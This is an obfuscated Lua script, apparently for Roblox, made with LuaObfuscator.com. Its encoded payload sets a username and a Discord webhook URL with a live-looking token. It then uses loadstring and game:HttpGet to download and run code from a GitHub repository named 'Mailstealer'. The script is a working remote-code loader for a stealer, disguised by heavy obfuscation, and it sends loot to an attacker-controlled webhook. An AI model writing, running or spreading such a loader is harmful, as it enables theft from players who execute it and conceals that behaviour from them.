--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==1) then return v32;end if (v31==(0 -(619 -(555 + 64)))) then v32=v1(v16,v19,v19);v19=v19 + (1 -(931 -(857 + 74))) ;v31=2 -1 ;end end end v23=nil;function v23()local v33=568 -(367 + 201) ;local v34;local v35;while true do if (v33==(927 -(214 + 641 + 72))) then v34,v35=v1(v16,v19,v19 + 2 );v19=v19 + 1 + 1 ;v33=1 + 0 ;end if (v33==(878 -(282 + 595))) then return (v35 * (1893 -(1523 + 114))) + v34 ;end end end v18=3;end if (v18==4) then function v25()local v36=v24();local v37=v24();local v38=1 -0 ;local v39=(v21(v37,1066 -(68 + 997) ,(1308 -(10 + 8)) -(226 + 1044) ) * ((8 -6)^(149 -(32 + 85)))) + v36 ;local v40=v21(v37,56 -35 ,55 -24 );local v41=((v21(v37,24 + 8 )==(998 -(915 + 82))) and  -(1 + 0)) or (1 + 0) ;if (v40==(957 -(892 + 65))) then if (v39==((0 -0) -(442 -(416 + 26)))) then return v41 * (0 -0) ;else v40=1 -0 ;v38=350 -((277 -190) + 263) ;end elseif (v40==(2227 -(67 + 113))) then return ((v39==(0 + 0)) and (v41 * (1/(0 + 0)))) or (v41 * NaN) ;end return v8(v41,v40-(1015 + 8) ) * (v38 + (v39/((793 -(368 + 423))^((55 + 72) -75)))) ;end v26=nil;function v26(v42)local v43;if  not v42 then local v86=0 -0 ;while true do if (v86==(438 -(145 + 94 + 199))) then v42=v24();if (v42==(430 -(44 + 386))) then return "";end break;end end end v43=v3(v16,v19,(v19 + v42) -1 );v19=v19 + v42 ;local v44={};for v70=1487 -(998 + 488) , #v43 do v44[v70]=v2(v1(v3(v43,v70,v70)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=1002 -(923 + 79) ;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v45==(1638 -(1373 + 263))) then v50=nil;v51=nil;v45=1 + 2 ;end if (v45==4) then v54=nil;while true do if ((1002 -(451 + 549))~=v46) then else local v99=0;while true do if (v99~=1) then else v46=1 + 2 ;break;end if (v99==(753 -(239 + 514))) then v51=nil;v52=nil;v99=1;end end end if (v46==(4 -1)) then v53=nil;v54=nil;v46=6 -2 ;end if ((1384 -(746 + 638))~=v46) then else local v100=0;while true do if ((1 + 0)==v100) then v46=1 + 0 ;break;end if ((0 -0)==v100) then v47=341 -(218 + 123) ;v48=nil;v100=1;end end end if (v46==(1585 -(1535 + 46))) then while true do if (v47==(0 + 0)) then local v125=0 + 0 ;while true do if (0==v125) then v48=0;v49=nil;v125=1;end if (1==v125) then v47=1;break;end end end if (v47==2) then local v126=560 -(306 + 254) ;local v127;while true do if (v126==(0 -0)) then v127=0 + 0 ;while true do if (v127==(1 -0)) then v47=5 -2 ;break;end if (v127==(1467 -(899 + 568))) then local v141=0;while true do if (v141==(1 + 0)) then v127=1;break;end if (v141==(0 -0)) then v52=nil;v53=nil;v141=337 -(144 + 192) ;end end end end break;end end end if (v47==(604 -(268 + 335))) then v50=nil;v51=nil;v47=2;end if (v47~=(293 -(60 + 230))) then else v54=nil;while true do local v128=572 -(426 + 146) ;local v129;while true do if (v128==(0 + 0)) then v129=0 + 0 ;while true do if (v129~=(1456 -(282 + 1174))) then else local v142=0 + 0 ;local v143;while true do if (v142~=(1504 -(363 + 1141))) then else v143=811 -(569 + 242) ;while true do if (v143==(0 -0)) then local v147=0 + 0 ;while true do if (v147~=(0 -0)) then else if (v48==2) then local v148=0 + 0 ;local v149;local v150;while true do if (v148~=0) then else v149=0;v150=nil;v148=1976 -(1913 + 62) ;end if (v148==1) then while true do if (v149~=(0 + 0)) then else v150=0 -0 ;while true do local v156=1024 -(706 + 318) ;local v157;while true do if (v156~=(1251 -(721 + 530))) then else v157=0 -0 ;while true do if (v157~=0) then else if (v150~=(1271 -(945 + 326))) then else local v165=0 -0 ;while true do if (v165~=(1 + 0)) then else v150=857 -(564 + 292) ;break;end if (v165~=(0 -0)) then else for v166=2 -1 ,v24() do local v167=700 -(271 + 429) ;local v168;local v169;local v170;while true do if (v167==(305 -(244 + 60))) then v170=nil;while true do if (v168==(0 + 0)) then local v173=476 -(41 + 435) ;while true do if (v173==(1 + 0)) then v168=1501 -(1408 + 92) ;break;end if (v173~=(1125 -(936 + 189))) then else v169=0 + 0 ;v170=nil;v173=1;end end end if (v168==(1087 -(461 + 625))) then while true do if (v169==(1288 -(993 + 295))) then v170=v22();if (v21(v170,1 + 0 ,1 + 0 )==(1171 -(418 + 753))) then local v174=0;local v175;local v176;local v177;local v178;while true do if (2~=v174) then else while true do if (v175==(0 + 0)) then local v179=0;local v180;while true do if (v179~=(0 + 0)) then else v180=0 + 0 ;while true do if (v180==(0 -0)) then v176=v21(v170,2 -0 ,1095 -(975 + 117) );v177=v21(v170,1879 -(157 + 1718) ,2 + 4 );v180=530 -(406 + 123) ;end if (v180~=(3 -2)) then else v175=1770 -(1749 + 20) ;break;end end break;end end end if (v175~=(1021 -(697 + 321))) then else if (v21(v177,1 + 2 ,1325 -(1249 + 73) )==(1 + 0)) then v178[1149 -(466 + 679) ]=v54[v178[9 -5 ]];end v49[v166]=v178;break;end if (v175~=(2 -1)) then else local v182=0;while true do if (v182==(1 -0)) then v175=2;break;end if (v182~=(0 -0)) then else v178={v23(),v23(),nil,nil};if (v176==(0 -0)) then local v187=114 -(4 + 110) ;local v188;while true do if (v187==(584 -(57 + 527))) then v188=1427 -(41 + 1386) ;while true do if (0==v188) then v178[1230 -(322 + 905) ]=v23();v178[107 -(17 + 86) ]=v23();break;end end break;end end elseif (v176==1) then v178[1192 -(449 + 740) ]=v24();elseif (v176==(874 -(826 + 46))) then v178[3 + 0 ]=v24() -(2^(35 -19)) ;elseif (v176~=(9 -6)) then else local v197=0 -0 ;local v198;local v199;while true do if (v197==0) then v198=166 -(122 + 44) ;v199=nil;v197=1;end if (v197~=(1 -0)) then else while true do if (v198~=(440 -(382 + 58))) then else v199=0;while true do if (v199~=0) then else v178[3]=v24() -((6 -4)^(14 + 2)) ;v178[4 + 0 ]=v23();break;end end break;end end break;end end end v182=1 -0 ;end end end if (v175==(1 + 1)) then local v183=0;while true do if (v183==0) then local v186=0 -0 ;while true do if (1~=v186) then else v183=1;break;end if (v186==(1205 -(902 + 303))) then if (v21(v177,1 -0 ,1 -0 )==(66 -(30 + 35))) then v178[2]=v54[v178[2]];end if (v21(v177,2,1 + 1 )==1) then v178[1693 -(1121 + 569) ]=v54[v178[3 + 0 ]];end v186=684 -(483 + 200) ;end end end if (v183~=(1464 -(1404 + 59))) then else v175=3;break;end end end end break;end if (v174~=(1257 -(1043 + 214))) then else v175=0 -0 ;v176=nil;v174=1;end if ((766 -(468 + 297))==v174) then v177=nil;v178=nil;v174=564 -(334 + 228) ;end end end break;end end break;end end break;end if (v167==0) then v168=0 -0 ;v169=nil;v167=2 -1 ;end end end for v171=3 -2 ,v24() do v50[v171-(1 + 0) ]=v29();end v165=1213 -(323 + 889) ;end end end if (v150==(2 -1)) then return v52;end break;end end break;end end end break;end end break;end end end if (v48~=(1 + 0)) then else local v151=0;while true do if (v151==(582 -(361 + 219))) then v48=4 -2 ;break;end if (1~=v151) then else local v152=0 + 0 ;while true do if (v152~=(321 -(53 + 267))) then else v151=1 + 1 ;break;end if (0==v152) then for v158=414 -(15 + 398) ,v53 do local v159=982 -(18 + 964) ;local v160;local v161;while true do if (v159==(0 + 0)) then local v162=0 -0 ;while true do if (v162==(1 + 0)) then v159=1 -0 ;break;end if ((0 + 0)==v162) then local v164=0;while true do if (0==v164) then v160=v22();v161=nil;v164=851 -(20 + 830) ;end if (v164~=1) then else v162=164 -(92 + 71) ;break;end end end end end if (v159==(1 + 0)) then if (v160==1) then v161=v22()~=(0 -0) ;elseif (v160==(128 -(116 + 10))) then v161=v25();elseif (v160~=(3 + 0)) then else v161=v26();end v54[v158]=v161;break;end end end v52[1 + 2 ]=v22();v152=739 -(542 + 196) ;end end end if (v151~=(0 -0)) then else local v153=0 + 0 ;local v154;while true do if (v153==(0 + 0)) then v154=849 -(254 + 595) ;while true do if (v154==0) then v53=v24();v54={};v154=127 -(55 + 71) ;end if (1~=v154) then else v151=1 + 0 ;break;end end break;end end end end end v147=1 -0 ;end if (v147==(1791 -(573 + 1217))) then v143=2 -1 ;break;end end end if (v143==(2 -1)) then v129=1552 -(1126 + 425) ;break;end end break;end end end if ((406 -(118 + 287))~=v129) then else if (v48==(939 -(714 + 225))) then local v144=0 -0 ;while true do if ((3 -2)==v144) then local v145=1121 -(118 + 1003) ;while true do if (1~=v145) then else v144=5 -3 ;break;end if (v145~=(377 -(142 + 235))) then else v51={};v52={v49,v50,nil,v51};v145=49 -(25 + 23) ;end end end if (v144~=(0 + 0)) then else local v146=977 -(553 + 424) ;while true do if (v146~=(1 + 0)) then else v144=1 -0 ;break;end if (v146~=0) then else v49={};v50={};v146=1 + 0 ;end end end if (v144~=(2 + 0)) then else v48=1 + 0 ;break;end end end break;end end break;end end end break;end end break;end if (v46==(1 + 0)) then local v101=0 + 0 ;while true do if ((2 -1)==v101) then v46=3 -1 ;break;end if (0~=v101) then else v49=nil;v50=nil;v101=2 -1 ;end end end end break;end if (v45~=3) then else v52=nil;v53=nil;v45=4;end if (v45~=1) then else v48=nil;v49=nil;v45=4 -2 ;end if ((285 -(175 + 110))==v45) then v46=0 -0 ;v47=nil;v45=4 -3 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v55)if (v1(v55,2)==79) then v20=v0(v3(v55,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v55,16));if v20 then local v102=v5(v88,v20);v20=nil;return v102;else return v88;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v56=1796 -(503 + 1293) ;local v57;local v58;local v59;local v60;while true do if (v56==(2 -1)) then return (v60 * (12132649 + 4186860 + 457707)) + (v59 * 65536) + (v58 * (1317 -(810 + 251))) + v57 ;end if ((533 -(43 + 490))==v56) then v57,v58,v59,v60=v1(v16,v19,v19 + 3 );v19=v19 + 3 + 1 ;v56=1 + 0 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v72=v64;local v73=v65;local v74=v66;local v75=v28;local v76=1;local v77= -1;local v78={};local v79={...};local v80=v12("#",...) -1 ;local v81={};local v82={};for v89=0,v80 do if (v89>=v74) then v78[v89-v74 ]=v79[v89 + 1 ];else v82[v89]=v79[v89 + 1 ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do v84=v72[v76];v85=v84[1];if (v85<=3) then if (v85<=1) then if (v85==0) then local v103;local v104;v82[v84[2]]=v84[3];v76=v76 + 1 ;v84=v72[v76];v63[v84[3]]=v82[v84[2]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v84[3];v76=v76 + 1 ;v84=v72[v76];v63[v84[3]]=v82[v84[2]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v84[3];v76=v76 + 1 ;v84=v72[v76];v63[v84[3]]=v82[v84[2]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v63[v84[3]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v63[v84[3]];v76=v76 + 1 ;v84=v72[v76];v104=v84[2];v103=v82[v84[3]];v82[v104 + 1 ]=v103;v82[v104]=v103[v84[4]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v84[3];else local v114=v84[2];v82[v114]=v82[v114](v13(v82,v114 + 1 ,v77));end elseif (v85>2) then v63[v84[3]]=v82[v84[2]];else v82[v84[2]]();end elseif (v85<=5) then if (v85>4) then do return;end else v82[v84[2]]=v84[3];end elseif (v85<=6) then local v120=v84[2];local v121=v82[v84[3]];v82[v120 + 1 ]=v121;v82[v120]=v121[v84[4]];elseif (v85==7) then v82[v84[2]]=v63[v84[3]];else local v132=0;local v133;local v134;local v135;local v136;while true do if (v132==2) then for v138=v133,v77 do v136=v136 + 1 ;v82[v138]=v134[v136];end break;end if (v132==1) then v77=(v135 + v133) -1 ;v136=0;v132=2;end if (v132==0) then v133=v84[2];v134,v135=v75(v82[v133](v13(v82,v133 + 1 ,v84[3])));v132=1;end end end v76=v76 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v67,v68,v69)if v69 then local v92=733 -(711 + (70 -48)) ;local v93;while true do if (v92==(0 -(1739 -(404 + 1335)))) then v93=(v67/((861 -(240 + 619))^(v68-(1 + 0))))%((2 -0)^(((v69-(1 + 0)) -(v68-(1745 -(1344 + 400)))) + (406 -(255 + 150)))) ;return v93-(v93%1) ;end end else local v94=2^(v68-(1 + 0)) ;return (((v67%(v94 + v94))>=v94) and (1 + (406 -(183 + 223)))) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!093O0003083O00557365724E616D6503093O00646A6C756B6131323103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133353234322O33323130333532303238372F6B4578437A5336395430387439365F71474F622D4A44514241703334326E525741574968616B4A6A4E4F5251346E795136445778756347654D556E63704F63497A41516A03093O00557365724E616D6532030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E65000E3O00124O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0008000100034O00015O00022O00023O000100012O00053O00017O00",v9(),...);
